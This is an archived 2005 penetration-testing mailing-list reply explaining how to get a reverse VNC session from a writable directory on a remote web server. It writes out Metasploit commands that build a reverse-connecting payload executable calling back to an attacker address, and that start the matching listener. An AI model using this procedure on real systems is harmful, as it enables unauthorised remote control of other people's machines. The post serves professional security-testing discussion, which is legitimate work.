Penetration Testing mailing list archives
Re: How to get a reverse Shell / VNC from a writable directory on a remote web server.
From: H D Moore <sflist () digitaloffense net>
Date: Fri, 5 Aug 2005 15:16:52 -0500
On Friday 05 August 2005 06:02, AsTriXs wrote:
Does Metasploit provide an option?
You *might* be able to use msfpayload and the payload_handler exploit to do this, but for reasons I have yet to investigate, the VNC payload isn't working well under the exe loader. The process for this is: 1) Generate an executable: $ msfpayload win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 X > test.exe 2) Copy the executable to your target somehow. 3) Start up the Framework with the payload_handler exploit module: $ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 E 4) Execute the standalone payload stager on the target system. 5) Enjoy your happy VNC access, assuming you have write access to the current interactive desktop. This process has been tested with most of the win32 Metasploit payloads, but YMMV. This is a handy way to load up meterpreter via client-side execution bugs too ;-) -HD ------------------------------------------------------------------------------ FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't Learn the hacker's secrets that compromise wireless LANs. Secure your WLAN by understanding these threats, available hacking tools and proven countermeasures. Defend your WLAN against man-in-the-Middle attacks and session hijacking, denial-of-service, rogue access points, identity thefts and MAC spoofing. Request your complimentary white paper at: http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801 -------------------------------------------------------------------------------
Current thread:
- How to get a reverse Shell / VNC from a writable directory on a remote web server. AsTriXs (Aug 05)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. Ricardo Mourato (Aug 06)
- RE: How to get a reverse Shell / VNC from a writable directory on a remote web server. Irene Abezgauz (Aug 06)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. H D Moore (Aug 06)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. Maarten Hartsuijker (Aug 06)